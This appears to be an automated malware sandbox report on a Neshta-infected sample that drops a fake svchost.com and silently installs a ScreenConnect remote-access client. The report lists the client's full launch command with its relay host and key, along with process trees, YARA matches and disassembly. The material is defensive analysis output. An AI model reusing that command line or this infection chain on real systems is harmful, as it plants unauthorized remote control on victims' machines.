                          Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIDF2.tmpJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Windows\svchost.comJump to behavior
                          Source: $RUX313H.exe.0.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Source: $RUX313H.exe.0.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Source: $RUX313H.exe.0.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Source: $RUX313H.exe.0.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Source: $RUX313H.exe.0.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Source: $RUX313H.exeBinary or memory string: OriginalFilename vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll4 vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000002.675339509.0000000003410000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000002.682658964.0000000005BC0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll4 vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs $RUX313H.exe
                          Source: $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs $RUX313H.exe
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\$RUX313H.exe.logJump to behavior
                          Source: classification engineClassification label: mal100.spre.spyw.evad.winEXE@22/143@11/2
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,9_2_003F1880
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F1880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,9_2_003F1880
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F1880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,9_2_003F1880
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1010 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,FindResourceW,LoadResource,LockResource,SizeofResource,SafeArrayCreateVector,SafeArrayAccessData,_memmove,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,1_2_00DF1010
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)Jump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile read: C:\Users\user\Desktop\$RUX313H.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\$RUX313H.exe 'C:\Users\user\Desktop\$RUX313H.exe'
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe 'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe'
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi'
                          Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msi
                          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0182DFF70E04F7ABAC76BB82B6886C6B C
                          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB8DBADD131F30B4DC6FBBC948643C7D
                          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4E4F6FBCD6D549CE2F7F73B63973119C E Global\MSI0000
                          Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-qchhoo-relay.screenconnect.com&p=443&s=da6b3e03-98fc-419f-a376-8535999f3893&k=BgIAAACkAABSU0ExAAgAAAEAAQCXhSdnV8AclTo6Qg2d%2fUagHnAuTk77VdidkN%2fHwklWj60Ukj2cjyUWF%2fyj6%2bi86j%2f4iIiD4EcKkvFNApE%2f%2fmy7V5iz8I7WLvfaBXsciWcr9yEcfZSl4AvW0iWJ2LVg8s%2bvTxK6lFGCfPmCOGop3GjLhAffGO2uiyhzZdY3cdBnrxVR1d2KV8lAELZ5VBoUfKrKrkChwusd1M6gHfzfqZEpzKJahX9yu4v97YxVChPN3WG0TWWhcEs0ZJpQzPn3g2NaZ6xL5%2bVj8rp0nPDBPjXcy%2fWFzRXbyKOD%2fA0vieIxBiRLOIqNVTkIntBIZAUsEi%2bi0gvAM%2f6xLcwwLQe0K7rN'
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe' 'RunRole' 'c39657e2-0cc8-4a24-afd0-5db7dcfd0e5b' 'User'
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe 'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe' Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi'Jump to behavior
                          Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msiJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0182DFF70E04F7ABAC76BB82B6886C6B CJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB8DBADD131F30B4DC6FBBC948643C7DJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4E4F6FBCD6D549CE2F7F73B63973119C E Global\MSI0000Jump to behavior
                          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe' 'RunRole' 'c39657e2-0cc8-4a24-afd0-5db7dcfd0e5b' 'User'
                          Source: C:\Users\user\Desktop\$RUX313H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                          Source: C:\Windows\svchost.comMutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 @
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCommand line argument: mscoree.dll1_2_00DF1140
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCommand line argument: v4.0.303191_2_00DF1140
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCommand line argument: _RESOLVER1_2_00DF1140
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCommand line argument: _ENTRYPOINT1_2_00DF1140
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCommand line argument: GetServiceName9_2_003F1880
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCommand line argument: Service9_2_003F1880
                          Source: $RUX313H.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: $RUX313H.exeStatic file information: File size 4193672 > 1048576
                          Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdbzz source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.663867933.0000000000DF9000.00000002.00020000.sdmp
                          Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmp
                          Source: Binary string: c:\Users\jmorgan\Source\ScreenConnectWork\Custom\DotNetRunner\DotNetResolver\obj\Release\DotNetResolver.pdb source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.675339509.0000000003410000.00000004.00020000.sdmp
                          Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: $RUX313H.exe, 00000000.00000003.661576351.000000000261D000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                          Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: $RUX313H.exe, $RUX313H.exe, 00000001.00000000.663867933.0000000000DF9000.00000002.00020000.sdmp
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_3_022C0482 pushfd ; ret 0_3_022C0489
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_3_022C1DF5 pushfd ; iretd 0_3_022C1FED
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_3_022C0442 pushad ; ret 0_3_022C0461
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_3_022C60DD push es; retf 0000h0_3_022C60F8
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040802C push 00408052h; ret 0_2_0040804A
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004070A4 push 004070D0h; ret 0_2_004070C8
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004041D8 push 00404204h; ret 0_2_004041FC
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004041A0 push 004041CCh; ret 0_2_004041C4
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404256 push 00404284h; ret 0_2_0040427C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404258 push 00404284h; ret 0_2_0040427C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404210 push 0040423Ch; ret 0_2_00404234
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004042C8 push 004042F4h; ret 0_2_004042EC
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404290 push 004042BCh; ret 0_2_004042B4
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404370 push 0040439Ch; ret 0_2_00404394
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404300 push 0040432Ch; ret 0_2_00404324
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404338 push 00404364h; ret 0_2_0040435C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004043E0 push 0040440Ch; ret 0_2_00404404
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004043A8 push 004043D4h; ret 0_2_004043CC
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00410778 push 00406D36h; ret 0_2_004107C6
